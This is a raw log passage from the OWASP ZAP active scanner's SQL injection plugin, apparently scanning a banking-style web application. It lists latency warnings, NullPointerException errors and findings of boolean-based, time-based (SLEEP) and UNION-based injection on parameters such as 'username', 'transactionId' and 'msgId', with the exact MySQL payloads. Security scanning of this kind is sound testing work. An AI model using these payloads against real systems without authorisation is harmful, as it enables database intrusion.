org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112170 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112171 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112173 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112174 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112176 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112177 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112179 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112180 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112182 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112183 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112184 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112186 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112187 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112191 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112192 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112195 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - There is considerable lagging in connection response(s) which gives a standard deviation of 982.9046902431801ms on the sample set which is more than 500.0ms 9112403 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'transactionId' is not injectable 9112435 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-02-02' AND 8293=8293 AND 'zMni'='zMni] on parameter 'transactionDate' 9112436 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9122545 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [empty' AND (SELECT * FROM (SELECT(SLEEP(5)))MhTr) AND 'LzkR'='LzkR] on parameter 'description' 9122546 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9122559 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))twqg) AND 'IhBM'='IhBM] on parameter 'transactionDate' 9122560 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9122633 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9122642 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9122653 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9122659 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9122770 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9122779 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9122784 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9122789 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9122839 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [133 AND 3807=3807] on parameter 'transactionId' 9122840 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9122844 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [david' AND 3033=3033 AND 'xwHi'='xwHi] on parameter 'username' 9122845 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9132963 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [david' AND (SELECT * FROM (SELECT(SLEEP(5)))yocC) AND 'VzZB'='VzZB] on parameter 'username' 9132964 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9132967 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [133 AND (SELECT * FROM (SELECT(SLEEP(5)))XHmg)] on parameter 'transactionId' 9132967 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9132989 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9132995 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9133022 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9133031 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9133072 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9133078 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9133120 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9133132 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9133138 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [133 #] on parameter 'transactionId' 9133139 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9133144 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9133152 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9133154 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [david' #] on parameter 'username' 9133155 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9133254 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 9403=9403] on parameter 'minBalanace' 9133255 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9133285 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8910=8910) THEN 8910 ELSE 8910*(SELECT 8910 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9133286 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9143344 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))aHwG)] on parameter 'minBalanace' 9143345 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9143358 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9143362 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))iBdj)] on parameter 'msgid' 9143364 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9143364 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9143404 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9143409 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9143428 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9143433 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9143476 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9143485 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9143662 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [1 AND 5914=5914] on parameter 'msgId' 9143663 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9143679 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [132 AND 9665=9665] on parameter 'transactionId' 9143680 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9153784 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))iwck)] on parameter 'msgId' 9153785 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9153792 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [132 AND (SELECT * FROM (SELECT(SLEEP(5)))tvDA)] on parameter 'transactionId' 9153793 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9153801 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9153806 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9153810 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9153818 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9153848 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9153853 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9153865 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9153869 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9153873 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9153880 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9153881 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9153882 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9153888 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9153892 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9153897 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [132 #] on parameter 'transactionId' 9153897 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9154106 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (5257=5257) THEN 5257 ELSE 5257*(SELECT 5257 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionDate' 9154107 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9164179 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02 AND (SELECT * FROM (SELECT(SLEEP(5)))ogYv)] on parameter 'transactionDate' 9164180 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9164196 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9164199 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9164238 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9164242 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9164244 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))TMkS) AND 'nJsr'='nJsr] on parameter 'transactionDate' 9164245 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9164262 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9164267 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9164272 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-02-02 #] on parameter 'transactionDate' 9164273 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9164510 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 1280=1280 AND 'hCKe'='hCKe] on parameter 'transactionDate' 9164511 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9164909 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 9104=9104 AND 'MyCc'='MyCc] on parameter 'transactionDate' 9164909 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9174599 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))KRva) AND 'dUqn'='dUqn] on parameter 'transactionDate' 9174600 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9174744 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9174744 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9174924 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8441=8441) THEN 8441 ELSE 8441*(SELECT 8441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9174925 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9174979 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))UgaN) AND 'MFBw'='MFBw] on parameter 'transactionDate' 9174980 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9175018 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9175022 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9175025 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9175032 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9175082 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9175086 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9175091 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9175095 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9175317 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 4034=4034 AND 'ZXZe'='ZXZe] on parameter 'transactionDate' 9175318 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9184979 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))BroU)] on parameter 'orderby' 9184981 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9185343 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (3362=3362) THEN 3362 ELSE 3362*(SELECT 3362 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9185344 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9185387 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))KKKI) AND 'FLWR'='FLWR] on parameter 'transactionDate' 9185388 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9185532 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9185533 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9185726 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 6927=6927] on parameter 'minBalanace' 9185727 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9195413 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))ljhU)] on parameter 'msgid' 9195414 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9195758 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (8164=8164) THEN 8164 ELSE 8164*(SELECT 8164 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgId' 9195759 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9195785 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))rPmK)] on parameter 'minBalanace' 9195786 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9195803 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9195809 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9195850 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9195854 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9195869 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9195873 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9195908 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 